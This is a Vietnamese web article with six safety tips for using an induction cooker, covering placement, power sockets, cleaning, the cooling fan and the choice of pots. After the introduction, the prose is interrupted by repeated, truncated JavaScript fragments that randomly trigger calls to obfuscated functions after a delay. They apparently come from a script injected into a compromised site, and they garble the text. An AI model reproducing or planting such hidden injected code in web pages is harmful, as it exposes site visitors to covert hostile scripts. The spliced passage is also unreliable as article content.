Hướng dẫn sử dụng bếp điện từ an toàn

Ngày nay, bếp điện từ là sự lựa chọn của nhiều gia đình bởi sự tiện dụng, an toàn, dễ sử dụng…. Đây là loại bếpđược đánh giá là dòng bếp an toàn… Tuy vậy, để phát huy hết hiệu quả, cũng như mang lại sự an toàn cho người sử dụng, bạn cần lưu ý một vài điểm dưới đây.andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

1. Đặt bếp nơi khô thoáng trong thời gian sử dụng, vì bếp có thể báo động giả khi môi trường xung quanh có nhiệt độ cao.  Không đặt bếp gần các thiết bị điện tử khác như ti vi, đầu đĩa, máy tính… do bếp có thể phát ra bức xạ sóng điện từ gây nhiễu sóng cho các thiết bị.

2.  Chọn dây nguồn và ổ cắm phù hợp với công suất của bếp từ (1.800W – 2.000W). Không dùng chung ổ điện có bếp từ đang hoạt động với các thiết bị khác, tránh tình trạng cháy nổ. Không rút nguồn điện ngay khi ngừng sử dụng, vì quạt giải nhiệt của bếp vẫn tiếp tục hoạt động và sẽ tự động tắt sau khi làm mát các bộ phận khác. Nên chọn loại bếp tiết kiệm điện.

3. Tránh để nước nóng tràn lên mặt bếp, dễ gây nứt bề mặt. Vệ sinh bếp từ thường xuyên, đặc biệt là mặt tiếp xúc của bếp với nồi nấu. Không để giấy báo, hoặc vải dưới đáy bếp, che luồng khí lưu thông vào bếp.

Cách sử dụng bếp từ an toàn và tiện lợi

Bếp từ rất tiện lợi cho mỗi gia đình

4. Thường xuyên kiểm tra quạt giải nhiệt bên dưới bếp, đảm bảo cho bếp hoạt động ổn định.  Không duy trì nhiệt độ cao liên tục trong khi sử dụng, để tránh hỏng nồi và hỏng thức ăn.

5. Không chạm vào mặt bếp ngay sau khi sử dụng, vì khi hoạt động nhiệt độ ở đáy nồi khá cao đã truyền sang bề mặt bếp,điều này rất cần thiết để bảo đảm an toàn cho người sử dụng.

6. Nên chọn sản phẩm của các hãng có thương hiệu, nguồn gốc xuất xứ rõ ràng. – Chọn nồi có đáy bằng phẳng, kim loại, sắt từ, như: Inox hút nam châm, sắt niken, nồi có đáy tráng sắt hoặc nồi men…

Các Đối Tác Lớn